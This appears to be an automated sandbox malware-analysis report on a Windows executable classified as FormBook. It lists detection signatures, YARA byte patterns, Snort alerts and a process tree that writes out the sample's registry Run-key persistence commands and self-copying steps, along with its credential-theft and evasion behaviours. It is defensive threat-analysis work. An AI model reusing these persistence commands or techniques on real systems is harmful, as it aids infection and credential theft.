Windows Analysis Report
4Ear91jgQ7.exe

Overview

General Information

Sample name:4Ear91jgQ7.exe
renamed because original name is a hash value
Original sample name:dcf2ceb7faa5754e5fb0b7db1cc23637.exe
Analysis ID:1479336
MD5:dcf2ceb7faa5754e5fb0b7db1cc23637
SHA1:0259609ed1ec649f797869ca14a7aef9f2029ffb
SHA256:9732f930cd31110f63aaf92cc17895b65303bb06a4968b127f4687270941acdd
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • 4Ear91jgQ7.exe (PID: 4416 cmdline: "C:\Users\user\Desktop\4Ear91jgQ7.exe" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 1772 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7108 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 3560 cmdline: cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • NQKKZTlEHzDNbnTfYhwoCSpWHN.exe (PID: 1084 cmdline: "C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • NQKKZTlEHzDNbnTfYhwoCSpWHN.exe (PID: 1600 cmdline: "C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 4Ear91jgQ7.pif (PID: 6180 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 4852 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2876 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 7108 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 2276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif (PID: 3840 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 2796 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4072 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5408 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 6256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif (PID: 6436 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 3652 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4368 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5896 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif (PID: 5480 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 6552 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 6368 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 2636 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif (PID: 3596 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 6444 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5896 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 4092 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif (PID: 5000 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 3472 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5796 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 3372 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1088 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif.pif (PID: 6476 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • WerFault.exe (PID: 3376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 4Ear91jgQ7.pif.pif.pif.pif (PID: 4012 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 4836 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 3480 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 6848 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif.pif.pif (PID: 5244 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 3616 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2652 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 3308 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
7.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
7.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
7.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
7.2.RegAsm.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16912:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\4Ear91jgQ7.pif, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7108, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4Ear91jgQ7
            Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1772, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", ProcessId: 7108, ProcessName: reg.exe
            Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Documents\4Ear91jgQ7.pif" , CommandLine: "C:\Users\user\Documents\4Ear91jgQ7.pif" , CommandLine|base64offset|contains: , Image: C:\Users\user\Documents\4Ear91jgQ7.pif, NewProcessName: C:\Users\user\Documents\4Ear91jgQ7.pif, OriginalFileName: C:\Users\user\Documents\4Ear91jgQ7.pif, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Documents\4Ear91jgQ7.pif" , ProcessId: 6180, ProcessName: 4Ear91jgQ7.pif
            Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4Ear91jgQ7.exe", ParentImage: C:\Users\user\Desktop\4Ear91jgQ7.exe, ParentProcessId: 4416, ParentProcessName: 4Ear91jgQ7.exe, ProcessCommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", ProcessId: 1772, ProcessName: cmd.exe
            No Snort rule has matched
            Timestamp:2024-07-23T14:50:57.879866+0200
            SID:2855464
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:51:22.805881+0200
            SID:2855465
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:55.333044+0200
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:42.942343+0200
            SID:2855464
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:51:00.411005+0200
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:40.420760+0200
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:45.608238+0200
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:11.389671+0200
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:48.333694+0200
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: C:\Users\user\Documents\4Ear91jgQ7.pif, ReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif, ReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif, ReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif, ReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif, ReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif, ReversingLabs: Detection: 13%
            Source: 4Ear91jgQ7.exe, ReversingLabs: Detection: 13%
            Source: Yara match, File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif, Joe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif, Joe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif, Joe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif, Joe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif, Joe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif, Joe Sandbox ML: detected
            Source: 4Ear91jgQ7.exe, Joe Sandbox ML: detected
            Source: 4Ear91jgQ7.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown, HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49738 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49750 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: 4Ear91jgQ7.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WERFE22.tmp.dmp.61.dr
